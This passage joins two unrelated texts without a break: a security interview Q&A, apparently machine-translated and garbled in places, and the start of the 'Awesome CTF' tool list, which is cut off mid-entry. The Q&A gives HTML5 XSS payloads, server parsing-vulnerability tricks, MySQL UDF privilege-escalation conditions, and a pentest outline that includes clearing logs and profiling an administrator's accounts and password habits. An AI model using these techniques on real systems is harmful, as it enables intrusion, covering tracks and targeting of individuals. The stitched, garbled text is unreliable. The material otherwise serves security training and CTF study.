attack initiated by the client > > SSRF is server-side request forgery, initiated by the server > > Replay attack is to replay the intercepted data packets for identity authentication and other purposes. * SSRF * SSRF vulnerability principle, utilization and repair plan? What is the difference between Java and PHP SSRF? * Logical Vulnerabilities * Say at least three business logic vulnerabilities and how to fix them? > 1) The password recovery vulnerability exists in the password to allow brute force cracking, the existence of universal recovery documents, the ability to skip the verification step, the recovery of the voucher can be obtained, etc. to obtain the password through the password recovery function provided by the manufacturer. > > 2) The most common authentication vulnerability is session fixed attack and cookie spoofing. You can fake user identity by getting Session or Cookie. > > 3) The verification code exists in the verification code vulnerability to allow brute force cracking, and the verification code can be bypassed by Javascript or packet modification. * Override access (horizontal/vertical/unauthorized) * Talk about the difference between horizontal/vertical/unauthorized unauthorized access? * How to detect the violation of power? * XML injection * What is XXE? What is the repair plan? * XXE is an XML external entity injection attack. XML can request local or remote content by calling an entity. Similar to remote file protection, it can cause related security issues, such as sensitive file reading. Repair method: The XML parsing library strictly prohibits the parsing of external entities when called. * URL redirection * URL whitelist bypass * HTML5 * Talk about the new security features of HTML5 > H5 has added a lot of tags and has a lot of options to bypass the xss defense. There is also the addition of local storage, localstorage and session storage, which can be modified by xss to achieve a similar storage xss effect. <code> <video onerror=alert(1)><source> <video><sourceonerror="javascript:alert(1)" <video src=".." onloadedmetadata="alert(1)" ondurationchanged="alert(2)" ontimeupdate="alert(3)"></video> <video><sourceonerrorsourceonerrorsourceonerrorsourceonerror="javascript:alert(1)"> <videopostervideopostervideopostervideoposter=”javascript:alert(1)”> </code> * What tags should be included in the HTML5 whitelist? See <a href="https://segmentfault.com/a/1190000003756563">HTML5 Security Issues</a> * java * What java framework do you know about? > struts2 , spring, spring security, shiro, etc. > * What is the MVC structure of java, and what is the order of data flow to the database? * Understand the java sandbox? * Can ibats' parameterized query control sql injection effectively? Is there a dangerous way to cause sql injection? * Talk about the principle of two struts2 vulnerabilities * What role does ongl play in this payload? * What is the hexadecimal encoding of the character \u0023? Why use him in the payload? * Does java vulnerabilities occur when executing system commands? What statements are there in java, methods can execute system commands * If you are asked to fix an xss vulnerability, will you fix it in that layer of the java program? * Where is the xss filter set in the java program? * Say what problems may exist in the security of java class reflections * The principle of Java deserialization vulnerability? Solution? * PHP * What methods are available in php to prevent errors from being echoed? > php's configuration file php.ini has been modified. When display_errors = On is changed to display_errors = off, there is no error message. > Add error_reporting(0) at the beginning of the php script; it can also achieve the effect of closing the error. > In addition to the above, you can also add @ in front of the execution statement * What security features can be set by php.ini > Close the error, set open_basedir, disable the dangerous function, open gpc. There is a specific article on the security configuration, which belongs to the scope of operation and maintenance. > * What is the principle of php's %00 truncation? > Exist in version 5.3.4, generally use the truncation of the file name when the file is uploaded, or there may be a 00 stage when the file is operated. For example, filename=test.php%00.txt will be truncated to test.php, and 00 is ignored. When the system reads the file name, if it encounters 0x00, it will consider that the reading has ended. > * php webshell detection, what are the methods? > Personally, there are two types of static detection and dynamic detection. Static detection, such as finding dangerous functions, such as eval, system, etc. Dynamic detection is the action to be performed when the script is running, such as file operations, socket operations, and so on. The specific method can be detected by D shield or other killing software, and now there is webshell recognition based on machine learning. > * php LFI, what is the principle of local vulnerability? Write a code with a vulnerability. How to find out by hand? How do you traverse the file if there is no error returning? * The principle of php deserialization vulnerability? Solution? * Middleware * What security hardening does tomcat do? * If tomcat restarts, under webapps, will the background you delete be back again? * Common web server middleware container. > IIS, Apache, nginx, Lighttpd, Tomcat > * What are the more common middleware containers in JAVA? > Tomcat/Jetty/JBOSS/WebLogic/Coldfusion/Websphere/GlassFish * Talk about common middleware parsing exploits > IIS 6.0 > /xx.asp/xx.jpg "xx.asp" is the folder name > > IIS 7.0/7.5 > Default Fast-CGI is enabled. Enter /1.php directly after the image address in the url, and the normal image will be parsed as php. > > Nginx > The version is less than or equal to 0.8.37. The method is the same as IIS 7.0/7.5, and the Fast-CGI can be used when it is closed. > empty byte code xxx.jpg%00.php > > Apache > The uploaded file is named test.php.x1.x2.x3, and Apache is suffixed from right to left. > > lighttpd > xx.jpg/xx.php > * How does Redis' unauthorized access vulnerability exploit? * Database * What is the difference between MySQL UDF and 5.1 and above, and what are the conditions? > 1) Mysql version is larger than 5.1 version udf.dll file must be placed in the lib\plugin folder under the MYSQL installation directory. > > 2) Mysql version is less than version 5.1. The udf.dll file is placed in c:\windows\system32 under Windows 2003 and c:\winnt\system32 under windows2000. > > 3) Master the mysql database account has the mysql insert and delete permissions to create and discard the function, generally the root account is better, with the other accounts of the root account can also be used. > > 4) Permission to write udf.dll to the appropriate directory. * What libraries are available by default in the mysql database? Say the name of the library > infomation_schema, msyql, performance_scheme, test > * mysql username and password are stored in that table? What encryption method does mysql password use? > The user table under the mysql database. > * mysql table permissions, in addition to additions and deletions to change the check, file read and write, what permissions? * How to do mysql security? * How to private sqlserver public permission * Windows, Linux, database reinforcement and power reduction ideas, choose one * Linux * Briefly describe what needs to be done for Linux system security hardening * What tools do you use to determine if the system has a back door? * What is Selinux for Linux? How to set up Selinux? * Which layer of iptables work in the TCPIP model? * If the kernel cannot be upgraded, how can I ensure that the system is not authorized by the known exp? * What are the logs in syslog? Where to find the log of the installation software? * How to query the login log of ssh? How to configure the log format of syslog? * Can syslog be viewed directly using tools such as vi? Is it a binary file? * How do you respond to an emergency if a Linux server is compromised? * Common commands for bounce shells? Which kind of shell does it usually rebound? why? * Emergency Response * What kinds of backdoor implementations are there? * What is the idea of ​​webshell detection? * After the Trojan in the Linux server, please briefly describe the emergency ideas? * How should I respond to an emergency after encountering a new 0day\ (such as Struts2\)? * In which directions can the security assessment be conducted before the new business goes online? * From which directions can the existing system be audited to find out the security risks? * Information Collection * What information is collected when you step on the point? * The role of DNS in penetration * How to get around the CDN to get the real IP of the target website, talk about your ideas? <a href="https://zhuanlan.zhihu.com/p/33440472">Summary of ways to bypass the CDN to find real IP on the site</a> * If you are given a website, what is your penetration testing idea? Subject to written authorization * 1. Information collection > 1) Obtain the whois information of the domain name, obtain the registrant's email name and phone number. > > 2) Query the server side station and the sub-domain name site, because the main station is generally difficult, so first look at the side stations for general-purpose cms or other vulnerabilities. > > 3) View the server operating system version, web middleware, to see if there are known vulnerabilities, such as IIS, APACHE, NGINX parsing vulnerabilities > > 4) View the IP, perform an IP address port scan, and perform vulnerability detection on the responding port, such as rsync, heart bleeding, Mysql, ftp, ssh weak password, etc. > 5) Scan the site directory structure to see if you can traverse the directory, or sensitive file leaks, such as php probe > > 6) google hack further probes website information, background, sensitive files * 2. Vulnerability scanning > Start detecting vulnerabilities such as XSS, CSRF, SQL injection, code execution, command execution, unauthorized access, directory read, arbitrary file read, Download, file contains, remote command execution, weak password, upload, editor vulnerability, brute force, etc. * 3. Exploitation > Get the webshell or other permissions using the above method * 4. Privilege promotion > Elevate the server, such as mysql udf privilege under windows, serv-u privilege, windows low version of the vulnerability, such as iis6, pr, Brazilian barbecue > linux dirty cow vulnerability, linux kernel version vulnerabilities, mysql root privilege under linux and oracle low privilege * 5. Log cleaning * 6. Summary report and repair plan * In the infiltration process, what is the value of collecting the target station registrant mailbox for us? > 1) Drop the social library to see if there is any password leaked, and then try to log in to the background with the leaked password. > > 2) Use the mailbox as a keyword to throw into the search engine. > > 3) Use the searched related information to find other mails and get the common social accounts. > > 4) Social workers find social accounts, which may find the administrator's habit of setting passwords. > > 5) Use the existing information to generate a dedicated dictionary. > > 6) Observe what non-popular websites the administrator often visits, take it, and you will get more good things. * What is the significance of determining the CMS of the website for infiltration? > 1) Find vulnerable bugs on the web. > > 2) If open source, you can also download the corresponding source code for code auditing. > > 3) A mature and relatively safe CMS, the meaning of sweeping the catalog when infiltrating? > > 4) sensitive files, secondary directory scanning > > 5) The misoperation of the webmaster such as: compressed files of the website backup, description.txt, secondary directory may store other sites
# Awesome CTF [![Build Status](https://travis-ci.org/apsdehal/awesome-ctf.svg?branch=master)](https://travis-ci.org/apsdehal/awesome-ctf) [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) A curated list of [Capture The Flag](https://en.wikipedia.org/wiki/Capture_the_flag#Computer_security) (CTF) frameworks, libraries, resources, softwares and tutorials. This list aims to help starters as well as seasoned CTF players to find everything related to CTFs at one place. ### Contributing Please take a quick look at the [contribution guidelines](https://github.com/apsdehal/ctf-tools/blob/master/CONTRIBUTING.md) first. #### _If you know a tool that isn't present here, feel free to open a pull request._ ### Why? It takes time to build up collection of tools used in CTF and remember them all. This repo helps to keep all these scattered tools at one place. ### Contents - [Awesome CTF](#awesome-ctf) - [Create](#create) - [Forensics](#forensics) - [Platforms](#platforms) - [Steganography](#steganography) - [Web](#web) - [Solve](#solve) - [Attacks](#attacks) - [Bruteforcers](#bruteforcers) - [Cryptography](#crypto) - [Exploits](#exploits) - [Forensics](#forensics-1) - [Networking](#networking) - [Reversing](#reversing) - [Services](#services) - [Steganography](#steganography-1) - [Web](#web-1) - [Delibrated Vulnerable App](#delibrated-vulnerable-app) - [Android](#android) - [Java](#java) - [NodeJS](#nodejs) - [PHP](#php) - [Python](#python) - [Real World DVA](#real-world-dva) - [Resources](#resources) - [Keywords to explore](#keywords-to-explore) - [Operating Systems](#operating-systems) - [Starter Packs](#starter-packs) - [Tutorials](#tutorials) - [Wargames](#wargames) - [Websites](#websites) - [Wikis](#wikis) - [Writeups Collections](#writeups-collections) # Create *Tools used for creating CTF challenges* - [Kali Linux CTF Blueprints](https://www.packtpub.com/eu/networking-and-servers/kali-linux-ctf-blueprints) - Online book on building, testing, and customizing your own Capture the Flag challenges. ## Forensics *Tools used for creating Forensics challenges* - [Dnscat2](https://github.com/iagox86/dnscat2) - Hosts communication through DNS. - [Kroll Artifact Parser and Extractor (KAPE)](https://learn.duffandphelps.com/kape) - Triage program. - [Magnet AXIOM](https://www.magnetforensics.com/downloadaxiom) - Artifact-centric DFIR tool. - [Registry Dumper](http://www.kahusecurity.com/posts/registry_dumper_find_and_dump_hidden_registry_keys.html) - Dump your registry. ## Platforms *Projects that can be used to host a CTF* - [CTFd](https://github.com/isislab/CTFd) - Platform to host jeopardy style CTFs from ISISLab, NYU Tandon. - [echoCTF.RED](https://github.com/echoCTF/echoCTF.RED) - Develop, deploy and maintain your own CTF infrastructure. - [FBCTF](https://github.com/facebook/fbctf) - Platform to host Capture the Flag competitions from Facebook. - [Haaukins](https://github.com/aau-network-security/haaukins)- A Highly Accessible and Automated Virtualization Platform for Security Education. - [HackTheArch](https://github.com/mcpa-stlouis/hack-the-arch) - CTF scoring platform. - [Mellivora](https://github.com/Nakiami/mellivora) - A CTF engine written in PHP. - [MotherFucking-CTF](https://github.com/andreafioraldi/motherfucking-ctf) - Badass lightweight plaform to host CTFs. No JS involved. - [NightShade](https://github.com/UnrealAkama/NightShade) - A simple security CTF framework. - [OpenCTF](https://github.com/easyctf/openctf) - CTF in a box. Minimal setup required. - [PicoCTF](https://github.com/picoCTF/picoCTF) - The platform used to run picoCTF. A great framework to host any CTF. - [PyChallFactory](https://github.com/pdautry/py_chall_factory) - Small framework to create/manage/package jeopardy CTF challenges. - [RootTheBox](https://github.com/moloch--/RootTheBox) - A Game of Hackers (CTF Scoreboard & Game Manager). - [Scorebot](https://github.com/legitbs/scorebot) - Platform for CTFs by Legitbs (Defcon). - [SecGen](https://github.com/cliffe/SecGen) - Security Scenario Generator. Creates randomly vulnerable virtual machines. ## Steganography *Tools used to create stego challenges* Check solve section for steganography. ## Web *Tools used for creating Web challenges* *JavaScript Obfustcators* - [Metasploit JavaScript Obfuscator](https://github.com/rapid7/metasploit-framework/wiki/How-to-obfuscate-JavaScript-in-Metasploit) - [Uglify](https://github.com/mishoo/UglifyJS) # Solve *Tools used for solving CTF challenges* ## Attacks *Tools used for performing various kinds of attacks* - [Bettercap](https://github.com/bettercap/bettercap) - Framework to perform MITM (Man in the Middle) attacks. - [Yersinia](https://github.com/tomac/yersinia) - Attack various protocols on layer 2. ## Crypto *Tools used for solving Crypto challenges* - [CyberChef](https://gchq.github.io/CyberChef) - Web app for analysing and decoding data. - [FeatherDuster](https://github.com/nccgroup/featherduster) - An automated, modular cryptanalysis tool. - [Hash Extender](https://github.com/iagox86/hash_extender) - A utility tool for performing hash length extension attacks. - [padding-oracle-attacker](https://github.com/KishanBagaria/padding-oracle-attacker) - A CLI tool to execute padding oracle attacks. - [PkCrack](https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html) - A tool for Breaking PkZip-encryption. - [QuipQuip](https://quipqiup.com) - An online tool for breaking substitution ciphers or vigenere ciphers (without key). - [RSACTFTool](https://github.com/Ganapati/RsaCtfTool) - A tool for recovering RSA private key with various attack. - [RSATool](https://github.com/ius/rsatool) - Generate private key with knowledge of p and q. - [XORTool](https://github.com/hellman/xortool) - A tool to analyze multi-byte xor cipher. ## Bruteforcers *Tools used for various kind of bruteforcing (passwords etc.)* - [Hashcat](https://hashcat.net/hashcat/) - Password Cracker - [Hydra](https://tools.kali.org/password-attacks/hydra) - A parallelized login cracker which supports numerous protocols to attack - [John The Jumbo](https://github.com/magnumripper/JohnTheRipper) - Community enhanced version of John the Ripper. - [John The Ripper](http://www.openwall.com/john/) - Password Cracker. - [Nozzlr](https://github.com/intrd/nozzlr) - Nozzlr is a bruteforce framework, trully modular and script-friendly. - [Ophcrack](http://ophcrack.sourceforge.net/) - Windows password cracker based on rainbow tables. - [Patator](https://github.com/lanjelot/patator) - Patator is a multi-purpose brute-forcer, with a modular design. - [Turbo Intruder](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack) - Burp Suite extension for sending large numbers of HTTP requests ## Exploits *Tools used for solving Exploits challenges* - [DLLInjector](https://github.com/OpenSecurityResearch/dllinjector) - Inject dlls in processes. - [libformatstr](https://github.com/hellman/libformatstr) - Simplify format string exploitation. - [Metasploit](http://www.metasploit.com/) - Penetration testing software. - [Cheatsheet](https://www.comparitech.com/net-admin/metasploit-cheat-sheet/) - [one_gadget](https://github.com/david942j/one_gadget) - A tool to find the one gadget `execve('/bin/sh', NULL, NULL)` call. - `gem install one_gadget` - [Pwntools](https://github.com/Gallopsled/pwntools) - CTF Framework for writing exploits. - [Qira](https://github.com/BinaryAnalysisPlatform/qira) - QEMU Interactive Runtime Analyser. - [ROP Gadget](https://github.com/JonathanSalwan/ROPgadget) - Framework for ROP exploitation. - [V0lt](https://github.com/P1kachu/v0lt) - Security CTF Toolkit. ## Forensics *Tools used for solving Forensics challenges* - [Aircrack-Ng](http://www.aircrack-ng.org/) - Crack 802.11 WEP and WPA-PSK keys. - `apt-get install aircrack-ng` - [Audacity](http://sourceforge.net/projects/audacity/) - Analyze sound files (mp3, m4a, whatever). - `apt-get install audacity` - [Bkhive and Samdump2](http://sourceforge.net/projects/ophcrack/files/samdump2/) - Dump SYSTEM and SAM files. - `apt-get install samdump2 bkhive` - [CFF Explorer](http://www.ntcore.com/exsuite.php) - PE Editor. - [Creddump](https://github.com/moyix/creddump) - Dump windows credentials. - [DVCS Ripper](https://github.com/kost/dvcs-ripper) - Rips web accessible (distributed) version control systems. - [Exif Tool](http://www.sno.phy.queensu.ca/~phil/exiftool/) - Read, write and edit file metadata. - [Extundelete](http://extundelete.sourceforge.net/) - Used for recovering lost data from mountable images. - [Fibratus](https://github.com/rabbitstack/fibratus) - Tool for exploration and tracing of the Windows kernel. - [Foremost](http://foremost.sourceforge.net/) - Extract particular kind of files using headers. - `apt-get install foremost` - [Fsck.ext4](http://linux.die.net/man/8/fsck.ext3) - Used to fix corrupt filesystems. - [Malzilla](http://malzilla.sourceforge.net/) - Malware hunting tool. - [NetworkMiner](http://www.netresec.com/?page=NetworkMiner) - Network Forensic Analysis Tool. - [PDF Streams Inflater](http://malzilla.sourceforge.net/downloads.html) - Find and extract zlib files compressed in PDF files. - [Pngcheck](http://www.libpng.org/pub/png/apps/pngcheck.html) - Verifies the integrity of PNG and dump all of the chunk-level information in human-readable form. - `apt-get install pngcheck` - [ResourcesExtract](http://www.nirsoft.net/utils/resources_extract.html) - Extract various filetypes from exes. - [Shellbags](https://github.com/williballenthin/shellbags) - Investigate NT\_USER.dat files. - [Snow](https://sbmlabs.com/notes/snow_whitespace_steganography_tool) - A Whitespace Steganography Tool. - [USBRip](https://github.com/snovvcrash/usbrip) - Simple CLI forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux. - [Volatility](https://github.com/volatilityfoundation/volatility) - To investigate memory dumps. - [Wireshark](https://www.wireshark.org) - Used to analyze pcap or pcapng files *Registry Viewers* - [OfflineRegistryView](https://www.nirsoft.net/utils/offline_registry_view.html) - Simple tool for Windows that allows you to read offline Registry files from external drive and view the desired Registry key in .reg file format. - [Registry Viewer®](https://accessdata.com/product-download/registry-viewer-2-0-0) - Used to view Windows registries. ## Networking *Tools used for solving Networking challenges* - [Masscan](https://github.com/robertdavidgraham/masscan) - Mass IP port scanner, TCP port scanner. - [Monit](https://linoxide.com/monitoring-2/monit-linux/) - A linux tool to check a host on the network (and other non-network activities). - [Nipe](https://github.com/GouveaHeitor/nipe) - Nipe is a script to make Tor Network your default gateway. - [Nmap](https://nmap.org/) - An open source utility for network discovery and security auditing. - [Wireshark](https://www.wireshark.org/) - Analyze the network dumps. - `apt-get install wireshark` - [Zeek](https://www.zeek.org) - An open-source network security monitor. - [Zmap](https://zmap.io/) - An open-source network scanner. ## Reversing *Tools used for solving Reversing challenges* - [Androguard](https://github.com/androguard/androguard) - Reverse engineer Android applications. - [Angr](https://github.com/angr/angr) - platform-agnostic binary analysis framework. - [Apk2Gold](https://github.com/lxdvs/apk2gold) - Yet another Android decompiler. - [ApkTool](http://ibotpeaches.github.io/Apktool/) - Android Decompiler. - [Barf](https://github.com/programa-stic/barf-project) - Binary Analysis and Reverse engineering Framework. - [Binary Ninja](https://binary.ninja/) - Binary analysis framework. - [BinUtils](http://www.gnu.org/software/binutils/binutils.html) - Collection of binary tools. - [BinWalk](https://github.com/devttys0/binwalk) - Analyze, reverse engineer, and extract firmware images. - [Boomerang](https://github.com/BoomerangDecompiler/boomerang) - Decompile x86/SPARC/PowerPC/ST-20 binaries to C. - [ctf_import](https://github.com/docileninja/ctf_import) – run basic functions from stripped binaries cross platform. - [cwe_checker](https://github.com/fkie-cad/cwe_checker) - cwe_checker finds vulnerable patterns in binary executables. - [demovfuscator](https://github.com/kirschju/demovfuscator) - A work-in-progress deobfuscator for movfuscated binaries. - [Frida](https://github.com/frida/) - Dynamic Code Injection. - [GDB](https://www.gnu.org/software/gdb/) - The GNU project debugger. - [GEF](https://github.com/hugsy/gef) - GDB plugin. - [Ghidra](https://ghidra-sre.org/) - Open Source suite of reverse engineering tools. Similar to IDA Pro. - [Hopper](http://www.hopperapp.com/) - Reverse engineering tool (disassembler) for OSX and Linux. - [IDA Pro](https://www.hex-rays.com/products/ida/) - Most used Reversing software. - [Jadx](https://github.com/skylot/jadx) - Decompile Android files. - [Java Decompilers](http://www.javadecompilers.com) - An online decompiler for Java and Android APKs. - [Krakatau](https://github.com/Storyyeller/Krakatau) - Java decompiler and disassembler. - [Objection](https://github.com/sensepost/objection) - Runtime Mobile Exploration. - [PEDA](https://github.com/longld/peda) - GDB plugin (only python2.7). - [Pin](https://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool) - A dynamic binary instrumentaion tool by Intel. - [PINCE](https://github.com/korcankaraokcu/PINCE) - GDB front-end/reverse engineering tool, focused on game-hacking and automation. - [PinCTF](https://github.com/ChrisTheCoolHut/PinCTF) - A tool which uses intel pin for Side Channel Analysis. - [Plasma](https://github.com/joelpx/plasma) - An interactive disassembler for x86/ARM/MIPS which can generate indented pseudo-code with colored syntax. - [Pwndbg](https://github.com/pwndbg/pwndbg) - A GDB plugin that provides a suite of utilities to hack around GDB easily. - [radare2](https://github.com/radare/radare2) - A portable reversing framework. - [Triton](https://github.com/JonathanSalwan/Triton/) - Dynamic Binary Analysis (DBA) framework. - [Uncompyle](https://github.com/gstarnberger/uncompyle) - Decompile Python 2.7 binaries (.pyc). - [WinDbg](http://www.windbg.org/) - Windows debugger distributed by Microsoft. - [Xocopy](http://reverse.lostrealm.com/tools/xocopy.html) - Program that can copy executables with execute, but no read permission. - [Z3](https://github.com/Z3Prover/z3) - A theorem prover from Microsoft Research. *JavaScript Deobfuscators* - [Detox](http://relentless-coding.org/projects/jsdetox/install) - A Javascript malware analysis tool. - [Revelo](http://www.kahusecurity.com/posts/revelo_javascript_deobfuscator.html) - Analyze obfuscated Javascript code. *SWF Analyzers* - [RABCDAsm](https://github.com/CyberShadow/RABCDAsm) - Collection of utilities including an ActionScript 3 assembler/disassembler. - [Swftools](http://www.swftools.org/) - Collection of utilities to work with SWF files. - [Xxxswf](https://bitbucket.org/Alexander_Hanel/xxxswf) - A Python script for analyzing Flash files. ## Services *Various kind of useful services available around the internet* - [CSWSH](http://cow.cat/cswsh.html) - Cross-Site WebSocket Hijacking Tester. - [Request Bin](https://requestbin.com/) - Lets you inspect http requests to a particular url. ## Steganography *Tools used for solving Steganography challenges* - [AperiSolve](https://aperisolve.fr/) - Aperi'Solve is a platform which performs layer analysis on image (open-source). - [Convert](http://www.imagemagick.org/script/convert.php) - Convert images b/w formats and apply filters. - [Exif](http://manpages.ubuntu.com/manpages/trusty/man1/exif.1.html) - Shows EXIF information in JPEG files. - [Exiftool](https://linux.die.net/man/1/exiftool) - Read and write meta information in files. - [Exiv2](http://www.exiv2.org/manpage.html) - Image metadata manipulation tool. - [Image Steganography](https://sourceforge.net/projects/image-steg/) - Embeds text and files in images with optional encryption. Easy-to-use UI. - [Image Steganography Online](https://incoherency.co.uk/image-steganography) - This is a client-side Javascript tool to steganographically hide images inside the lower "bits" of other images - [ImageMagick](http://www.imagemagick.org/script/index.php) - Tool for manipulating images. - [Outguess](https://www.freebsd.org/cgi/man.cgi?query=outguess+&apropos=0&sektion=0&manpath=FreeBSD+Ports+5.1-RELEASE&format=html) - Universal steganographic tool. - [Pngtools](https://packages.debian.org/sid/pngtools) - For various analysis related to PNGs. - `apt-get install pngtools` - [SmartDeblur](https://github.com/Y-Vladimir/SmartDeblur) - Used to deblur and fix defocused images. - [Steganabara](https://www.openhub.net/p/steganabara) - Tool for stegano analysis written in Java. - [SteganographyOnline](https://stylesuxx.github.io/steganography/) - Online steganography encoder and decoder. - [Stegbreak](https://linux.die.net/man/1/stegbreak) - Launches brute-force dictionary attacks on JPG image. - [StegCracker](https://github.com/Paradoxis/StegCracker) - Steganography brute-force utility to uncover hidden data inside files. - [stegextract](https://github.com/evyatarmeged/stegextract) - Detect hidden files and text in images. - [Steghide](http://steghide.sourceforge.net/) - Hide data in various kind of images. - [StegOnline](https://georgeom.net/StegOnline/upload) - Conduct a wide range of image steganography operations, such as concealing/revealing files hidden within bits (open-source). - [Stegsolve](http://www.caesum.com/handbook/Stegsolve.jar) - Apply various steganography techniques to images. - [Zsteg](https://github.com/zed-0xff/zsteg/) - PNG/BMP analysis. ## Web *Tools used for solving Web challenges* - [BurpSuite](https://portswigger.net/burp) - A graphical tool to testing website security. - [Commix](https://github.com/commixproject/commix) - Automated All-in-One OS Command Injection and Exploitation Tool. - [Hackbar](https://addons.mozilla.org/en-US/firefox/addon/hackbartool/) - Firefox addon for easy web exploitation. - [OWASP ZAP](https://www.owasp.org/index.php/Projects/OWASP_Zed_Attack_Proxy_Project) - Intercepting proxy to replay, debug, and fuzz HTTP requests and responses - [Postman](https://chrome.google.com/webstore/detail/postman/fhbjgbiflinjbdggehcddcbncdddomop?hl=en) - Add on for chrome for debugging network requests. - [Raccoon](https://github.com/evyatarmeged/Raccoon) - A high performance offensive security tool for reconnaissance and vulnerability scanning. - [SQLMap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool. ```pip install sqlmap``` - [W3af](https://github.com/andresriancho/w3af) - Web Application Attack and Audit Framework. - [XSSer](http://xsser.sourceforge.net/) - Automated XSS testor. *Cheatsheets used for solving or creating Web challenges* - [CHYbeta/Code-Audit-Challenges](https://github.com/CHYbeta/Code-Audit-Challenges) - vulnerable code snippets can be used for source code audit challenges (in Chinese) # Resources *Where to discover about CTF* ## Operating Systems *Penetration testing and security lab Operating Systems* - [Android Tamer](https://androidtamer.com/) - Based on Debian. - [BackBox](https://backbox.org/) - Based on Ubuntu. - [BlackArch Linux](https://blackarch.org/) - Based on Arch Linux. - [Fedora Security Lab](https://labs.fedoraproject.org/security/) - Based on Fedora. - [Kali Linux](https://www.kali.org/) - Based on Debian. - [Parrot Security OS](https://www.parrotsec.org/) - Based on Debian. - [Pentoo](http://www.pentoo.ch/) - Based on Gentoo. - [URIX OS](http://urix.us/) - Based on openSUSE. - [Wifislax](http://www.wifislax.com/) - Based on Slackware. *Malware analysts and reverse-engineering* - [Flare VM](https://github.com/fireeye/flare-vm/) - Based on Windows. - [REMnux](https://remnux.org/) - Based on Debian. ## Starter Packs *Collections of installer scripts, useful tools* - [CTF Tools](https://github.com/zardus/ctf-tools) - Collection of setup scripts to install various security research tools. - [LazyKali](https://github.com/jlevitsk/lazykali) - A 2016 refresh of LazyKali which simplifies install of tools and configuration. ## Tutorials *Tutorials to learn how to play CTFs* - [CTF Field Guide](https://trailofbits.github.io/ctf/) - Field Guide by Trails of Bits - [CTF related notes](https://github.com/it-ebooks/hacking-reading-list) - Personal CTFs and beyond notes (in Chinese) - [CTF Resources](http://ctfs.github.io/resources/) - Start Guide maintained by community - [CTF Tricks by Phithon](https://loudong.360.cn/Public/download/Phithon%E2%80%94%E2%80%94CTF%E6%AF%94%E8%B5%9B%E6%80%BB%E6%98%AF%E8%BE%93%EF%BC%9F%E4%BD%A0%E8%BF%98%E5%B7%AE%E7%82%B9Tricks!.pdf) - CTF tricks about Web (in Chinese) - [CTF-pwn-tips](https://github.com/Naetw/CTF-pwn-tips) - Some tips about pwn - [firmianay/CTF-All-In-One](https://github.com/firmianay/CTF-All-In-One) - all CTF related tutorials complied in one book (in Chinese) - [How to Get Started in CTF](https://www.endgame.com/blog/how-get-started-ctf) - Short guideline for CTF beginners by Endgame - [Intro. to CTF Course](https://www.hoppersroppers.org/courseCTF.html) - A free course that teaches beginners the basics of forensics, crypto, and web-ex. - [IppSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) - Video tutorials and walkthroughs of popular CTF platforms. - [LiveOverFlow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - Video tutorials on Exploitation. - [MIPT CTF](https://github.com/xairy/mipt-ctf) - A small course for beginners in CTFs (in Russian) - [OWASP Mutillidae 2 Project](https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project) - a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest - [RITSEC](https://github.com/ritsec) - RITSEC is a student run club at Rochester Institute of Technology. There are some CTF writeups and shares in this team repository. ## Wargames *Always online CTFs* - [247ctf](https://247ctf.com/) - A learning oriented real CTF platform with challenges covering across web, cryptography, networking, reversing and exploitation. - [Backdoor](https://backdoor.sdslabs.co/) - Security Platform by SDSLabs. - [buuoj](https://buuoj.cn/) - A CTF training platform with challenges collected from the past real CTF contests around the world. (in Chinese) - [Crackmes](https://crackmes.one/) - Reverse Engineering Challenges. - [CryptoHack](https://cryptohack.org/) - Fun cryptography challenges. - [echoCTF.RED](https://echoctf.red/) - Online CTF with a variety of targets to attack. - [Exploit Exercises](https://exploit-exercises.lains.space/) - Variety of VMs to learn variety of computer security issues. - [Exploit.Education](http://exploit.education) - Variety of VMs to learn variety of computer security issues. - [Gracker](https://github.com/Samuirai/gracker) - Binary challenges having a slow learning curve, and write-ups for each level. - [Hack The Box](https://www.hackthebox.eu) - Weekly CTFs for all types of security enthusiasts. - [Hack This Site](https://www.hackthissite.org/) - Training ground for hackers. - [Hacker101](https://www.hacker101.com/) - CTF from HackerOne - [Hacking-Lab](https://hacking-lab.com/) - Ethical hacking, computer network and security challenge platform. - [Hone Your Ninja Skills](https://honeyourskills.ninja/) - Web challenges starting from basic ones. - [IO](http://io.netgarage.org/) - Wargame for binary challenges. - [jarvisoj](https://www.jarvisoj.com/) - A CTF training platform developed by Jarvis from USSLab in ZJU. - [Microcorruption](https://microcorruption.com) - Embedded security CTF. - [Over The Wire](http://overthewire.org/wargames/) - Wargame maintained by OvertheWire Community. - [PentesterLab](https://pentesterlab.com/) - Variety of VM and online challenges (paid). - [PicoCTF](https://2019game.picoctf.com) - All year round ctf game. Questions from the yearly picoCTF competition. - [PWN Challenge](http://pwn.eonew.cn/) - Binary Exploitation Wargame. - [Pwnable.kr](http://pwnable.kr/) - Pwn Game. - [Pwnable.tw](https://pwnable.tw/) - Binary wargame. - [Pwnable.xyz](https://pwnable.xyz/) - Binary Exploitation Wargame. - [Reversin.kr](http://reversing.kr/) - Reversing challenge. - [Ringzer0Team](https://ringzer0team.com/) - Ringzer0 Team Online CTF. - [Root-Me](https://www.root-me.org/) - Hacking and Information Security learning platform. - [ROP Wargames](https://github.com/xelenonz/game) - ROP Wargames. - [SANS HHC](https://holidayhackchallenge.com/past-challenges/) - Challenges with a holiday theme released annually and maintained by SANS. - [SmashTheStack](http://smashthestack.org/) - A variety of wargames maintained by the SmashTheStack Community. - [Viblo CTF](https://ctf.viblo.asia) - Various amazing CTF challenges, in many different categories. Has both Practice mode and Contest mode. - [VulnHub](https://www.vulnhub.com/) - VM-based for practical in digital security, computer application & network administration. - [W3Challs](https://w3challs.com) - A penetration testing training platform, which offers various computer challenges, in various categories. - [WebHacking](http://webhacking.kr) - Hacking challenges for web. *Self-hosted CTFs* - [CTFTraining](https://github.com/CTFTraining/CTFTraining) - CTF challenge's source code, writeup collected from the past real CTF contests around the world. (in Chinese) - [My CTF Web Challenges](https://github.com/orangetw/My-CTF-Web-Challenges) - CTF 